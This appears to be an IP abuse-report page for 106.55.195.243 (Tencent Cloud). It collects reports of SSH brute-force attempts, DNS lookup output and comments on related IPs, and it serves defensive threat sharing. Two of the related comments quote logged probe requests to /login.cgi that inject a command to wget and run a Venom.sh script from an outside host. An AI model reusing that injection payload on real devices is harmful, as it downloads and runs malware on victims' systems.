106.55.195.243

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: Tencent Cloud Computing (Beijing) Co. Ltd.

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Oct 9 15:45:40 ns382633 sshd\[9389\]: Invalid user PlcmSpIp from 106.55.195.243 port 56214 Oct 9 15:45:40 ns382633 sshd\[9389\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Oct 9 15:45:41 ns382633 sshd\[9389\]: Failed password for invalid user PlcmSpIp from 106.55.195.243 port 56214 ssh2 Oct 9 15:53:02 ns382633 sshd\[10288\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 user=root Oct 9 15:53:04 ns382633 sshd\[10288\]: Failed password for root from 106.55.195.243 port 53506 ssh2	2020-10-10 02:19:21
attackbots	Sep 28 19:36:42 haigwepa sshd[32573]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Sep 28 19:36:44 haigwepa sshd[32573]: Failed password for invalid user bia from 106.55.195.243 port 36582 ssh2 ...	2020-09-29 02:16:54
attackspam	Sep 28 09:25:21 nextcloud sshd\[8611\]: Invalid user pdv from 106.55.195.243 Sep 28 09:25:21 nextcloud sshd\[8611\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Sep 28 09:25:23 nextcloud sshd\[8611\]: Failed password for invalid user pdv from 106.55.195.243 port 46198 ssh2	2020-09-28 18:24:26
attackspambots	2020-09-25 UTC: (6x) - ela,ftp_test,li,root(2x),sonar	2020-09-27 03:23:50
attackspambots	2020-09-25 UTC: (6x) - ela,ftp_test,li,root(2x),sonar	2020-09-26 19:20:58
attack	20 attempts against mh-ssh on pcx	2020-09-19 00:07:47
attack	20 attempts against mh-ssh on pcx	2020-09-18 16:14:37
attackbots	$f2bV_matches	2020-09-18 06:29:05
attackspam	Aug 31 10:14:59 george sshd[11990]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Aug 31 10:15:01 george sshd[11990]: Failed password for invalid user psh from 106.55.195.243 port 51404 ssh2 Aug 31 10:17:05 george sshd[12013]: Invalid user rahimi from 106.55.195.243 port 44028 Aug 31 10:17:05 george sshd[12013]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Aug 31 10:17:07 george sshd[12013]: Failed password for invalid user rahimi from 106.55.195.243 port 44028 ssh2 ...	2020-09-01 01:44:28
attack	Aug 22 10:13:46 firewall sshd[14582]: Failed password for invalid user wfp from 106.55.195.243 port 39374 ssh2 Aug 22 10:19:41 firewall sshd[14730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 user=root Aug 22 10:19:44 firewall sshd[14730]: Failed password for root from 106.55.195.243 port 41538 ssh2 ...	2020-08-23 03:21:01
attackspambots	Aug 20 15:57:50 cosmoit sshd[26038]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243	2020-08-21 03:08:24
attack	Aug 17 05:02:53 mockhub sshd[29489]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Aug 17 05:02:55 mockhub sshd[29489]: Failed password for invalid user oracle from 106.55.195.243 port 44800 ssh2 ...	2020-08-18 00:54:59
attack	Cowrie Honeypot: 3 unauthorised SSH/Telnet login attempts between 2020-08-08T03:52:26Z and 2020-08-08T04:04:10Z	2020-08-08 14:01:53
attackspam	Cowrie Honeypot: 3 unauthorised SSH/Telnet login attempts between 2020-08-04T17:48:03Z and 2020-08-04T17:59:36Z	2020-08-05 03:54:09
attack	Aug 2 22:25:08 mail sshd[17101]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 user=root Aug 2 22:25:09 mail sshd[17101]: Failed password for root from 106.55.195.243 port 43256 ssh2 ...	2020-08-03 04:57:26
attackspam	Invalid user hoa from 106.55.195.243 port 42952	2020-08-02 17:32:33
attack	Jul 26 08:16:03 ny01 sshd[29908]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243 Jul 26 08:16:05 ny01 sshd[29908]: Failed password for invalid user test123 from 106.55.195.243 port 47282 ssh2 Jul 26 08:21:27 ny01 sshd[30686]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.55.195.243	2020-07-26 23:17:26
attackbots	(sshd) Failed SSH login from 106.55.195.243 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Jul 18 05:24:14 amsweb01 sshd[18084]: Invalid user tester from 106.55.195.243 port 48370 Jul 18 05:24:16 amsweb01 sshd[18084]: Failed password for invalid user tester from 106.55.195.243 port 48370 ssh2 Jul 18 05:48:40 amsweb01 sshd[21812]: Invalid user eric from 106.55.195.243 port 34658 Jul 18 05:48:43 amsweb01 sshd[21812]: Failed password for invalid user eric from 106.55.195.243 port 34658 ssh2 Jul 18 05:55:06 amsweb01 sshd[22931]: Invalid user metronome from 106.55.195.243 port 43130	2020-07-18 13:44:24

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 106.55.195.243
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21653
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;106.55.195.243.			IN	A

;; AUTHORITY SECTION:
.			389	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020071702 1800 900 604800 86400

;; Query time: 65 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Jul 18 13:44:17 CST 2020
;; MSG SIZE  rcvd: 118

Host info

Host 243.195.55.106.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 243.195.55.106.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
114.67.80.209	attack	Dec 23 08:40:45 vps691689 sshd[18032]: Failed password for root from 114.67.80.209 port 45310 ssh2 Dec 23 08:49:53 vps691689 sshd[18287]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.80.209 ...	2019-12-23 15:50:28
156.219.251.174	attack	DLink DSL Remote OS Command Injection Vulnerability, PTR: host-156.219.174.251-static.tedata.net.	2019-12-23 15:24:44
37.24.118.239	attack	Dec 23 07:35:45 IngegnereFirenze sshd[12413]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=37.24.118.239 user=root ...	2019-12-23 15:38:04
222.186.190.2	attackspam	2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhos ...	2019-12-23 15:39:03
222.186.190.92	attackbotsspam	Dec 23 08:40:18 sd-53420 sshd\[16317\]: User root from 222.186.190.92 not allowed because none of user's groups are listed in AllowGroups Dec 23 08:40:18 sd-53420 sshd\[16317\]: Failed none for invalid user root from 222.186.190.92 port 52970 ssh2 Dec 23 08:40:18 sd-53420 sshd\[16317\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.92 user=root Dec 23 08:40:21 sd-53420 sshd\[16317\]: Failed password for invalid user root from 222.186.190.92 port 52970 ssh2 Dec 23 08:40:24 sd-53420 sshd\[16317\]: Failed password for invalid user root from 222.186.190.92 port 52970 ssh2 ...	2019-12-23 15:42:46
197.35.222.111	attack	2 attacks on wget probes like: 197.35.222.111 - - [22/Dec/2019:14:35:21 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:47:57
106.13.119.163	attack	Dec 23 08:01:38 eventyay sshd[23405]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.119.163 Dec 23 08:01:40 eventyay sshd[23405]: Failed password for invalid user gabrio from 106.13.119.163 port 46340 ssh2 Dec 23 08:07:32 eventyay sshd[23551]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.119.163 ...	2019-12-23 15:21:02
41.34.184.190	attackspambots	1 attack on wget probes like: 41.34.184.190 - - [22/Dec/2019:05:32:55 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:34:44
202.189.235.18	attackspam	Unauthorised access (Dec 23) SRC=202.189.235.18 LEN=52 TTL=112 ID=10598 DF TCP DPT=445 WINDOW=8192 SYN	2019-12-23 15:50:17
143.192.97.178	attackbotsspam	Dec 23 08:28:26 root sshd[6480]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=143.192.97.178 Dec 23 08:28:27 root sshd[6480]: Failed password for invalid user wp from 143.192.97.178 port 27281 ssh2 Dec 23 08:34:54 root sshd[6531]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=143.192.97.178 ...	2019-12-23 15:36:33
85.209.0.49	attackspam	Triggered: repeated knocking on closed ports.	2019-12-23 15:19:16
185.247.140.245	attackspam	Dec 23 08:34:26 MK-Soft-Root2 sshd[19380]: Failed password for root from 185.247.140.245 port 37618 ssh2 ...	2019-12-23 15:41:37
36.189.255.162	attack	Dec 23 08:36:30 localhost sshd\[21484\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=36.189.255.162 user=root Dec 23 08:36:32 localhost sshd\[21484\]: Failed password for root from 36.189.255.162 port 48976 ssh2 Dec 23 08:41:51 localhost sshd\[21985\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=36.189.255.162 user=root	2019-12-23 15:47:37
125.86.189.42	attack	Brute force attempt	2019-12-23 15:54:35
51.254.140.235	attackspam	Dec 23 08:02:22 nextcloud sshd\[28427\]: Invalid user kavaler from 51.254.140.235 Dec 23 08:02:22 nextcloud sshd\[28427\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.254.140.235 Dec 23 08:02:24 nextcloud sshd\[28427\]: Failed password for invalid user kavaler from 51.254.140.235 port 48322 ssh2 ...	2019-12-23 15:55:31

Recently Reported IPs

1.34.113.103	80.150.65.159	144.51.98.99	187.39.36.139
40.127.73.207	5.15.43.37	119.140.146.116	87.251.74.184
90.37.247.173	135.198.188.112	148.60.149.148	119.96.173.218
33.243.0.151	73.36.160.239	31.240.146.164	40.233.56.135
77.82.43.105	76.56.26.112	125.73.230.28	244.161.156.135